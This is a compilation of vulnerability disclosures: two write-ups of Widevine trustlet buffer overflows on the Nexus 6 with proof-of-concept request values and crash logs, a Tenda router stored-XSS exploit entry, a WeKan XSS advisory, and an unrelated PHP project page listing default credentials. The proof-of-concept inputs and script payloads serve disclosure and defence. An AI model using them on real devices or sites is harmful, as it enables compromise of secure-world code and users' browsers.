<5>widevine: "PRDiagPruneTrailingSlashes: ends!"
\*\*\* crash \*\*\*

The Android log in normal world reports that qseecom_send_cmd has failed with error -22, which means APP\_FAULTED:

<4>QSEECOM: qseecom\_load\_app: App (widevine) does'nt exist, loading apps for first time
<4>QSEECOM: qseecom\_load\_app: App with id 3 (widevine) now loaded
<3>QSEECOM: \_\_qseecom\_send\_cmd: Response result -1 not supported
<3>QSEECOM: qseecom\_ioctl: failed qseecom\_send\_cmd: -22
<4>QSEECOM: qseecom\_unload\_app: App id 3 now unloaded

The reason it crashes is because the large memory copy ends up writing to unmapped memory due to exceeding the data segment.

CVE-2022-48336: Cyber Intelligence - Hardware and Software Security Assessments

Widevine Trusted Application (TA) 5.0.0 through 7.1.1 has a PRDiagVerifyProvisioning integer overflow and resultant buffer overflow.

CVE-2022-48335:

Buffer Overflow in Widevine Trustlet (PRDiagVerifyProvisioning @ 0x5f90)

 

CVE:

CVE-2022-48335

Vendor:

Google

Device:

Nexus 6

Affected Component:

Widevine

Publication Date:

March 2023

Credits:

CyberIntel Team

Last edited: 11/04/23

**1\. Description**

Warning

To the best of our knowledge, the vulnerability described in this post has been incorrectly associated with CVE-2015-6639. After consulting with MITRE, it has been confirmed that this vulnerability had no assigned identifier. Consequently, CVE-2022-48335 has been assigned to this vulnerability.

On the other hand, it has been confirmed that CVE-2015-6639 does exist and corresponds with a different vulnerability reported by Google. We have notified all the concerned parties about this misunderstanding so that the confusion can be amended.

This entry describes a vulnerability that we found in the Widevine Trusted Application (TA), which runs within Qualcomm’s Secure Execution Environment (QSEE). The vulnerability is an integer overflow that leads to a subsequent buffer overflow. This bug has been found using tools we have developed to assist in the security evaluation of TrustZone, including a debugger and a coverage-based fuzzer for QSEE TAs. Please, refer to this page for further information.

Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series.

Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices.

An attacker could potentially exploit the vulnerability in the Trusted Application by sending a command from the Normal World, causing the application to crash and possibly execute arbitrary code. This vulnerability could have potential consequences, such as elevating attacker’s privileges and exposing sensitive information.

This post is part of a series of related bugs affecting Widevine Trusted Application of Google Nexus 6:

> *   CVE-2022-48331
>     
> *   CVE-2022-48332
>     
> *   CVE-2022-48333
>     
> *   CVE-2022-48334
>     
> *   CVE-2022-48335
>     
> *   CVE-2022-48336
>     
> *   CVE-2015-6639
>     
> *   CVE-2015-6647
>     

**2\. Affected Versions**

Affected versions are: 5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M), 5.1.1 (LYZ28N), 6.0.0 (MRA58K), 6.0.0 (MRA58N), 6.0.0 (MRA58R), 6.0.0 (MRA58X), 7.0.0 (NBD90Z), 7.0.0 (NBD91P), 7.0.0 (NBD91U), 7.0.0 (NBD91X), 7.0.0 (NBD91Y), 7.0.0 (NBD91Z), 7.0.0 (NBD92F), 7.0.0 (NBD92G), 7.1.1 (N6F26Q), 7.1.1 (N6F26R), 7.1.1 (N6F26U), 7.1.1 (N6F27C), 7.1.1 (N6F27E).

**3\. Impact**

This vulnerability has the potential to compromise the security of the system in multiple ways.

An attacker with high priviledges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system.

On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.

**4\. Vulnerability**

The bug is present in Widevine’s PRDiagVerifyProvisioning() command. This command closely resembles PRDiagClearProvisioning(), which has been featured in other blog entries (refer to CVE-2015-6647).

The following snippet shows a switch-case present in the TA’s command handler:

switch(\*req\_buf) {
case 0x50003: // PRDiagMaintenanceHandler
    if ((0x2807 < req\_buf\_size) && (7 < resp\_buf\_size)) {
        ret \= PRDiagMaintenanceHandler(req\_buf + 2, req\_buf\[1\]);
        ...
    }
    break;
}

It takes the Command ID from the first word of the Request Buffer, which is sent by client applications in the Normal World. Thus, if the received command is 0x50003, it jumps to the PRDiagMaintenanceHandler() function. This function handles two sub-commands: PRDiagVerifyProvisioning and PRDiagClearProvisioning.

The structure of the Request Buffer for the PRDiagMaintenanceHandler() function is the following:

struct widevine\_PRDiagMaintenanceHandler\_cmd {
        uint32\_t cmd\_id;
        uint32\_t payload\_size;
        struct widevine\_PRDiagMaintenanceHandler\_payload payload;
};

It contains an embedded structure and an integer indicating its size. The embedded structure is defined in the following code-block:

// Internal payload/request buffer for PRDiagMaintenanceHandler command
struct widevine\_PRDiagMaintenanceHandler\_payload {
        enum {
                op\_PRDiagVerifyProvisioning    \= 0,
                op\_PRDiagClearProvisioning     \= 1,
                PRDiagMH\_FORCE\_ENUM\_32\_BITS \= (INT\_MAX | ~INT\_MAX),
        } op;
        uint32\_t compare\_flag;
        uint32\_t msg\_buf\_size;
        uint32\_t data\_len;
        // The buffer containing the input data for the PRDiagVerifyProvisioning function.
        // This data could be related to provisioning information, cryptographic keys,
        // or other DRM-related metadata.
        // NOTE: The widevine trustlet checks the size of the request buffer
        // containing the widevine\_PRDiagMaintenanceHandler\_cmd structure.
        // The entire request buffer must have at least 0x2808 bytes
        char msg\_buf\[\];
};

The relevant parts are the op value indicating the sub-command to be executed (either PRDiagVerifyProvisioning or PRDiagClearProvisioning), an input buffer called msg_buf and its size, stored in msg_buf_size.

The PRDiagMaintenanceHandler function simply copies the payload/request into a temporary heap buffer and passes it to the corresponding sub-command:

int PRDiagMaintenanceHandler(void \*payload, uint32\_t payload\_size) {
     struct widevine\_PRDiagMaintenanceHandler\_payload \*req;

     if (!payload || !payload\_size) return 0x10;

     req \= malloc(payload\_size);
     if (!req) return 0xf;

     memcpy(req, payload, payload\_size);
     if (req\->op \== 0) {
         PRDiagVerifyProvisioning(req);
     }
     else if (req\->op \== 1) {
         PRDiagClearProvisioning(req);
     }
     ...

For this bug, let’s focus on the PRDiagVerifyProvisioning sub-command. The main functionality of this function is to check the integrity and authenticity of the provisioning data by comparing it to the corresponding data stored in the Secure File System (SFS).

The following code snippet shows a simplified version of the PRDiagVerifyProvisioning function:

int PRDiagVerifyProvisioning(struct widevine\_PRDiagMaintenanceHandler\_payload \*req) {
    // Check input and operation
    if (!req || req\->op != 0) return 0x10;

    msg\_buf\_size \= req\->msg\_buf\_size;
    msg\_buf \= &req\->msg\_buf;
    ...
    if (!req\->data\_len) {
        strlen(&persist\_prefix); // result ignored
        memzero(&filePathBuffer, 0x80); // 0x2e0fc
        memcpy(&filePathBuffer, msg\_buf, msg\_buf\_size);    }
    else {
        ...

The function first performs some validations on the input and the operation being requested and then checks the data_len value. If this value is zero, it copies the user-controlled msg_buf into a buffer in the data segment (0x2e0fc). The contents and size of this buffer are directly specified by the client through the Request Buffer.

The hardcoded value of the memzero suggests that the size of this buffer is 128 bytes. However, since msg_buf_size is not being checked, this copy operation can cause a buffer overflow:

This vulnerability allows an attacker to overwrite important data structures such as the stack and heap, since they are in higher addresses within this same data segment.

**5\. Exploitation**

This section shows a Proof of Concept (PoC) of how to trigger the vulnerability by sending a command to the Widevine trusted application running in the Secure World. Based on the command structure we have derived by reverse engineering, we can craft the command request to be sent to the trusted application:

req\->cmd\_id \= 0x50003;  // PRDiagMaintenanceHandler
req\->payload.op \= 0;    // PRDiagVerifyProvisioning
req\->payload.msg\_buf\_size \= 0x1644;
// 0x1644 overwrites ret-code in the stack
...
memset(req\->payload.msg\_buf, 'A', req\->payload.msg\_buf\_size);

The Commmand ID 0x50003 is specified to invoke PRDiagMaintenanceHandler(), and the PRDiagVerifyProvisioning operation is being specified. In addition, msg_buf_size is set to 0x1644 so that it overflows the data buffer and ends up overwriting the return code in the stack:

<5>widevine: "PRDiagMaintenanceHandler: pTzMsg 0xfff00008, reqlen 10240"
<5>widevine: "PRDiagVerifyProvisioning: begins!"
<5>widevine: "PRDiagVerifyProvisioning: returned 1094795585"
<5>widevine: "PRDiagMaintenanceHandler: returned 1094795585"

It can be observed that the returning value is 1094795585, which is the decimal representation of the value 0x41414141 that comes from our msg_buf buffer. We can also verify that this value is stored in the response buffer returned by the trusted application:

\[\*\] Widevine PRDiagMaintenanceHandler => Return code: 0x41414141

Adding four more bytes to the buffer being copied allows us to overwrite the return address in the stack and thus give us control over the execution flow:

req\->cmd\_id \= 0x50003;  // PRDiagMaintenanceHandler
req\->payload.op \= 0;    // PRDiagVerifyProvisioning
req\->payload.msg\_buf\_size \= 0x1648;
// 0x1648 overwrites return address in the stack
...
memset(req\->payload.msg\_buf, 'A', req\->payload.msg\_buf\_size);

Note that the difference is that we added four bytes to msg_buf_size:

<5>widevine: "PRDiagMaintenanceHandler: pTzMsg 0xfff00008, reqlen 10240"
<5>widevine: "PRDiagVerifyProvisioning: begins!"
\*\*\* crash @ 0x41414140 \*\*\*

The Android log in normal world reports that qseecom_send_cmd has failed with error -22, which means APP\_FAULTED. In this case, Widevine crashes because it ends up jumping to the address 0x41414140 coming from our msg_buf buffer.

<4>QSEECOM: qseecom\_load\_app: App (widevine) does'nt exist, loading apps for first time
<4>QSEECOM: qseecom\_load\_app: App with id 3 (widevine) now loaded
<3>QSEECOM: \_\_qseecom\_send\_cmd: Response result -1 not supported
<3>QSEECOM: qseecom\_ioctl: failed qseecom\_send\_cmd: -22
<4>QSEECOM: qseecom\_unload\_app: App id 3 now unloaded

CVE-2022-48335: Cyber Intelligence - Hardware and Software Security Assessments

Widevine Trusted Application (TA) 5.0.0 through 5.1.1 has a drm_verify_keys total_len+file_name_len integer overflow and resultant buffer overflow.

CVE-2022-48334:

Buffer Overflow in Widevine Trustlet (drm\_verify\_keys @ 0x7370)

 

CVE:

CVE-2022-48334

Vendor:

Google

Device:

Nexus 6

Affected Component:

Widevine

Publication Date:

March 2023

Credits:

CyberIntel Team

Last edited: 11/04/23

**1\. Description**

This entry describes a vulnerability that we found in the Widevine Trusted Application (TA), which runs within Qualcomm’s Secure Execution Environment (QSEE). The vulnerability is an integer overflow that leads to a subsequent buffer overflow. This bug has been found using tools we have developed to assist in the security evaluation of TrustZone, including a debugger and a coverage-based fuzzer for QSEE TAs. Please, refer to this page for further information.

Qualcomm Secure Execution Environment is one of the most widespread commercial TEE solutions in the smartphone space, used by many different devices such as Xiaomi, Motorola and several devices of the Google Nexus and Pixel series.

Widevine is a Digital Rights Management (DRM) technology developed by Google to protect copyrighted content and to enable secure distribution and consumption of video and audio content. The technology involves encryption, licensing, and key management to ensure that content can only be decrypted and played back on authorized devices.

An attacker could potentially exploit the vulnerability in the Trusted Application by sending a command from the Normal World, causing the application to crash and possibly execute arbitrary code. This vulnerability could have potential consequences, such as elevating attacker’s privileges and exposing sensitive information.

This post is part of a series of related bugs affecting Widevine Trusted Application of Google Nexus 6:

> *   CVE-2022-48331
>     
> *   CVE-2022-48332
>     
> *   CVE-2022-48333
>     
> *   CVE-2022-48334
>     
> *   CVE-2022-48335
>     
> *   CVE-2022-48336
>     
> *   CVE-2015-6639
>     
> *   CVE-2015-6647
>     

**2\. Affected Versions**

Affected versions are: 5.0.0 (LRX21O), 5.0.1 (LRX22C), 5.1.0 (LMY47D), 5.1.0 (LMY47E), 5.1.0 (LMY47I), 5.1.0 (LMY47M), 5.1.1 (LMY47Z), 5.1.1 (LMY48I), 5.1.1 (LMY48M), 5.1.1 (LMY48T), 5.1.1 (LMY48W), 5.1.1 (LMY48X), 5.1.1 (LMY48Y), 5.1.1 (LVY48C), 5.1.1 (LVY48E), 5.1.1 (LVY48F), 5.1.1 (LVY48H), 5.1.1 (LVY48I), 5.1.1 (LYZ28E), 5.1.1 (LYZ28J), 5.1.1 (LYZ28K), 5.1.1 (LYZ28M) and 5.1.1 (LYZ28N).

**3\. Impact**

This vulnerability has the potential to compromise the security of the system in multiple ways.

An attacker with high priviledges in Normal World can exploit the vulnerability to compromise the Trusted Application running in the Secure World, eventually executing arbitrary code and reading and/or modifying information of critical files, compromising the confidentiality and integrity of the system.

On the other hand, the attacker is able to crash the Trusted Application, potentially resulting in a denial of service.

**4\. Vulnerability**

The bug is present in Widevine’s drm_verify_keys() command. This command closely resembles drm_save_keys(), which has been featured in other blog entries (refer to CVE-2022-48331 and CVE-2022-48332).

The following snippet shows a switch-case present in the TA’s command handler:

switch(\*req\_buf) {
case 0x50002: // drm\_verify\_keys() command
    if ((0x2a0f < req\_buf\_size) && (0x107 < resp\_buf\_size)) {
        drm\_verify\_keys(
            req\_buf + 4,    req\_buf\[1\], // feature\_name
            req\_buf + 0x44, req\_buf\[2\]  // file\_name
        );
        ...
    }
    break;
}

It takes the Command ID from the first word of the Request Buffer, which is sent by client applications in the Normal World. Thus, if the received command is 0x50002, it jumps to the drm_verify_keys() function.

The structure of the Request Buffer for this command is the following:

struct widevine\_drm\_save\_keys\_cmd {
    uint32\_t cmd\_id;
    uint32\_t feature\_name\_len;
    uint32\_t file\_name\_len;
    char feature\_name\[0x100\];
    char file\_name\[0x100\];
};

It contains two buffers (_i.e._, feature_name and file_name) and two integers indicating the effective length of each buffer. It is important to note that even though the maximum size of each buffer is 256 bytes, the client has control over the values of feature_name_len and file_name_len, since they are directly taken from the Request Buffer.

The main functionality of drm_verify_keys() is to verify the integrity of encryption keys or DRM-related data stored within the Widevine DRM system. It performs the following high-level tasks:

> *   Validate input parameters and check for any constraints that may prevent the verification process.
>     
> *   Construct a full file path using the provided feature name and file name.
>     
> *   Set the CRC (cyclic redundancy check) file path, which is used for verifying the integrity of the keys.
>     
> *   Verify the stored encryption keys or DRM-related data and check for any tampering or corruption.
>     

The bug is present in the validation of input parameters while constructing the SFS file path:

heap\_buf \= malloc(0x100);
...
memzero(heap\_buf, 0x80);
prefix\_len \= strncpy(heap\_buf, &persist\_prefix, 0x80);
total\_len \= prefix\_len + feature\_name\_len;
// ---- CVE-2022-48333 ---- //
if (total\_len < 0x100) {
    prefix\_len \= strlen(&persist\_prefix);
    memcpy(heap\_buf + prefix\_len, feature\_name, feature\_name\_len);
    // ----------------------- //
    \*(heap\_buf + total\_len) \= '/';
    if (total\_len + feature\_name\_len < 0xff) {
        memcpy(heap\_buf + total\_len + 1, feature\_name, feature\_name\_len);
        total\_len += (feature\_name\_len + 1);        \*(heap\_buf + total\_len) \= '/';
        // ---- CVE-2022-48334 ---- //
        if (total\_len + file\_name\_len < 0xff) {            memcpy(heap\_buf + total\_len + 1, file\_name, file\_name\_len);            ...
}

In this code snippet, a heap buffer is allocated and the persist_prefix string is copied into it using the strncpy() function. This string is initialized with the value "/persist/data/" by default, so that it’s length is 14. The buffer is then filled with the provided feature name, ensuring the total length does not exceed the specified limit. This is done using total_len by adding the length of the persist_prefix string and feature_name_len, which is directly specified by the client through the Request Buffer.

The first part corresponds to CVE-2022-48333, where the check if (total_len < 0x100) is performed using a signed integer and can cause a buffer overflow if feature_name_len takes any value from -14 (0xfffffff2) to -1 (0xffffffff).

To pass this first check without triggering the first bug, the value of feature_name_len must be within the inclusive range of 1 to 241. Then, the code appends the feature_name string two times to the temporary heap buffer. In the previous code snippet, there is a second check on feature_name_len that constraints its value to \[1, 120\]. Finally, there is a third if that checks the value of file_name_len. At this point, the result of the addition is treated as a signed integer, which leads to an incorrect check. Consequently, this third check is bypassed when the values for file_name_len are sufficiently large:

req.feature\_name\_len \= 120; // valid values are: \[1, 120\]
req.file\_name\_len \= \-(14 + (2 \* req.feature\_name\_len) + 1);

The code after the check calls the memcpy() function to copy the contents of the file_name string into the heap buffer, using the improperly checked file_name_len. Since this value can be large enough, it can cause a buffer overflow in this copy operation:

The user has full control over the **value** of file_name_len and the **contents** of the file_name buffer in the Request Buffer.

Since there are several specific and large file_name_len values that can cause the buffer to overflow, a memory copy operation with any of these values will exceed the bounds of the data segment, resulting in an invalid memory access and potentially causing the application to crash.

**5\. Exploitation**

This section shows a Proof of Concept (PoC) of how to trigger the vulnerability by sending a command to the Widevine trusted application running in the Secure World. Based on the command structure we have derived by reverse engineering, we can craft the command request to be sent to the trusted application:

req\->cmd\_id \= 0x50002;  // drm\_verify\_keys
req.feature\_name\_len \= 1;
req.file\_name\_len \= 0xffffffff;
...

The Commmand ID 0x50002 is specified to invoke drm_verify_keys(), and file_name_len is set to 0xffffffff so that the sum of total_len + file_name_len overflows producing a small value, bypassing the check and eventually calling memcpy() producing the buffer overflow. When this request is sent to Widevine, it ends up crashing.

<5>widevine: "drm\_verify\_keys: feature\_name 0xfff00010, feature\_name\_len 1, file\_name 0xfff00110,  file\_name\_len 4294967295"
\*\*\* crash \*\*\*

The Android log in normal world reports that qseecom_send_cmd has failed with error -22, which means APP\_FAULTED:

<4>QSEECOM: qseecom\_load\_app: App (widevine) does'nt exist, loading apps for first time
<4>QSEECOM: qseecom\_load\_app: App with id 3 (widevine) now loaded
<3>QSEECOM: \_\_qseecom\_send\_cmd: Response result -1 not supported
<3>QSEECOM: qseecom\_ioctl: failed qseecom\_send\_cmd: -22
<4>QSEECOM: qseecom\_unload\_app: App id 3 now unloaded

The reason it crashes is because the large memory copy ends up writing to unmapped memory due to exceeding the data segment.

CVE-2022-48334: Cyber Intelligence - Hardware and Software Security Assessments

Tenda AC6 AC1200 Smart Dual-Band WiFi Router 15.03.06.50_multi was discovered to contain a cross-site scripting (XSS) vulnerability via the deviceId parameter in the Parental Control module.

    # Exploit Title: Stored Cross-Site scripting in the Tenda router via the deviceId parameter in the Parental Control module# Google Dork: None.# Date: Aug-30-2022# Exploit Author: 0x783# Vendor Homepage: https://tendacn.com/default.html# Software Link: https://www.tendacn.com/product/download/AC6.html# Version: AC6 AC1200 Smart Dual-Band WiFi Router - V15.03.06.50_multi# Tested on: Linux 5.15.0-58-generic# CVE : CVE-2022-40010-------------------------------------------------------------------------# 1. Technical Description:Tenda AC6 AC1200 Smart Dual-Band WiFi Router V15.03.06.50 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the deviceId parameter in the parental control section.# Steps to reproduce:1- Navigate to the router webserver usually at "http://192.168.0.1", or whatever the address of the router is.2- Navigate to the parental control section from the side bar.3- Add a new device to the list with any fake MAC address, device name, URL.4- Intercept the request using burpsuite and change the "deviceId" parameter to any javascript code (EX: <script>alert(document.domain")</script>).5- A pop-up with the domain should appear.

CVE-2022-40010: Tenda AC6 AC1200 15.03.06.50_multi Cross Site Scripting ≈ Packet Storm

A stored cross-site scripting (Stored XSS) vulnerability in file preview in WeKan before 6.75 allows remote authenticated users to inject arbitrary web script or HTML via names of file attachments. Any user can obtain the privilege to rename within their own board (where they have BoardAdmin access), and renameAttachment does not block XSS payloads.

SEC Consult Vulnerability Lab Security Advisory < 20230517-0 >  
=======================================================================  
               title: Stored XSS vulnerability in rename functionality  
             product: Wekan (Open-Source kanban)  
  vulnerable version: <=6.74  
       fixed version: 6.75 or higher  
          CVE number: CVE-2023-28485  
              impact: Medium  
            homepage: https://wekan.github.io  
               found: 2022-12-30  
                  by: Heiner Liesegang (Office Berlin)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult.  
                      SEC Consult is part of Eviden, an Atos business  
                      Europe | Asia | North America  
                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"WeKan ® is an completely Open Source and Free software collaborative  
kanban board application with MIT license.

Whether you’re maintaining a personal todo list,  
planning your holidays with some friends,  
or working in a team on your next revolutionary idea, Kanban boards  
are an unbeatable tool to keep your things organized.  
They give you a visual overview of the current state of your project,  
and make you productive by allowing you to focus on the few items that  
matter the most."

Source: https://github.com/wekan/wekan

Business recommendation:  
------------------------  
Patch the application with the latest update supplied by the vendor.

Vulnerability overview/description:  
-----------------------------------  
1) Stored Cross-Site Scripting (CVE-2023-28485)  
An authenticated attacker with the role 'BoardAdmin' is able to rename  
file attachments of Kanban cards. Being an admin of the Wekan instance  
is not required in order for this exploit to work, as any user can  
obtain 'BoardAdmin' privileges by creating a new Kanban board.

The 'renameAttachment' method does not sanitise user input and allows embedding  
XSS payloads in the specified filename. The stored XSS payload is triggered by  
opening the attachment as the modified filename is displayed in the header bar  
of the file preview.

Proof of concept:  
-----------------  
1) Stored Cross-Site Scripting (CVE-2023-28485)  
The following steps are necessary to exploit the vulnerability:  
   1. Log into the application with at least "user" privileges  
  2a. Open a Kanban board in which you have 'BoardAdmin' privileges  
  2b. Or, create a new Kanban board otherwise  
   3. Create a Kanban card if none exists  
   4. Open Kanban card to edit it  
   5. If there is no attachment in the card, upload one  
   6. Click on "Attachment Actions" under the attachment and select "Rename"  
   7. Include arbitrary XSS payload such as the following inside the filename:  
      "<script>alert('Stored XSS')</script>"  
   8. Select "Save" to embed the XSS payload

Any user with access to the board clicking on the attachment preview  
triggers the stored XSS. In case the used Kanban board is set to "public"  
any person with a link to the board can access the targeted card and  
trigger the payload inside the attachments' filename.

Vulnerable / tested versions:  
-----------------------------  
The following versions have been tested to be vulnerable:  
* v6.64  
* v6.69  
* v6.71

According to the vendor, all versions before 6.75 are affected as well.

Vendor contact timeline:  
------------------------  
2023-02-16: Contacting vendor security contact through support@wekan.team.  
2023-02-21: Vendor responded requesting a recheck of fixes in version 6.75.  
2023-02-27: Security patch is confirmed to fix vulnerability.  
2023-03-14: CVE number requested.  
2023-05-17: Public release of security advisory.

Solution:  
---------  
The vendor provides a patched version which should be installed immediately.  
The version 6.75 or higher provides the corresponding security patch:  
https://github.com/wekan/wekan

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult is part of Eviden, an Atos business  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part  
of Eviden, an Atos business. It ensures the continued knowledge gain of SEC  
Consult in the field of network and application security to stay ahead of the  
attacker. The SEC Consult Vulnerability Lab supports high-quality penetration  
testing and the evaluation of new offensive and defensive technologies for our  
customers. Hence our customers obtain the most current information about  
vulnerabilities and valid recommendation about the risk profile of new  
technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Heiner Liesegang / @2023

CVE-2023-28485: Wekan 6.74 Cross Site Scripting ≈ Packet Storm

Phpgurukul Student Study Center Management System V1.0 is vulnerable to Cross Site Scripting (XSS) in the "Admin Name" field on Admin Profile page.

**Student Study Center Management System using PHP and MySQL**

Student Study Center Management System Project is a web-based application developed using PHP and MySQL. In this project, the administrator can add the students and assign the desk for study.

**Project Requirements**

Project Name

Student Study Center Management System Project

Language Used

PHP5.6, PHP7.x

Database

MySQL 5.x

User Interface Design

HTML, AJAX,JQUERY,JAVASCRIPT

Web Browser

Mozilla, Google Chrome, IE8, OPERA

Software

XAMPP / Wamp / Mamp/ Lamp (anyone)

**Project Modules**

In Student Study Center Management System Project we use PHP and MySQL database. It has One module.

**Admin**

**Admin Module**

**Dashboard:** In this section, admin can view the total, available, and occupied Desks. Admin can also view the total registered users.

**Desks:** In this section, admin can manage the desks (add, update, delete).

**Students:** In this section, admin can manage the students (add, update, delete, view details).

**Assigned/Un-Assigned Desk:** In this section, admin can assign and un-assign the desk to the students.

**Report:** In this section, admin can generate the b/w dates report of assigned desks.

Admin can also update his profile, change password and recover password.

****Some of the Project Screens****

**Home Page**

**Admin Dashboard**

**Add Desk**

**Add Students**

**How to run the Student Study Center Management System (SSCMS) Project**

1\. Download the zip file

2\. Extract the file and copy sscms folder

3.Paste inside root directory(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/HTML)

4.Open PHPMyAdmin (http://localhost/phpmyadmin)

5\. Create a database with the name sscmsdb

6\. Import sscmsdb.sql file(given inside the zip package in the SQL file folder)

7\. Run the script http://localhost/sscms

**Credential for Admin panel :**

**Username:** admin  
**Password:** Test@123

**View Demo**

**Download BLMS Project Source Code**

**Project Report**

Anuj Kumar

Hi! I am Anuj Kumar, a professional web developer with 5+ years of experience in this sector. I found PHPGurukul in September 2015. My keen interest in technology and sharing knowledge with others became the main reason for starting PHPGurukul. My basic aim is to offer all web development tutorials like PHP, PDO, jQuery, PHP oops, MySQL, etc. Apart from the tutorials, we also offer you PHP Projects, and we have around 100+ PHP Projects for you.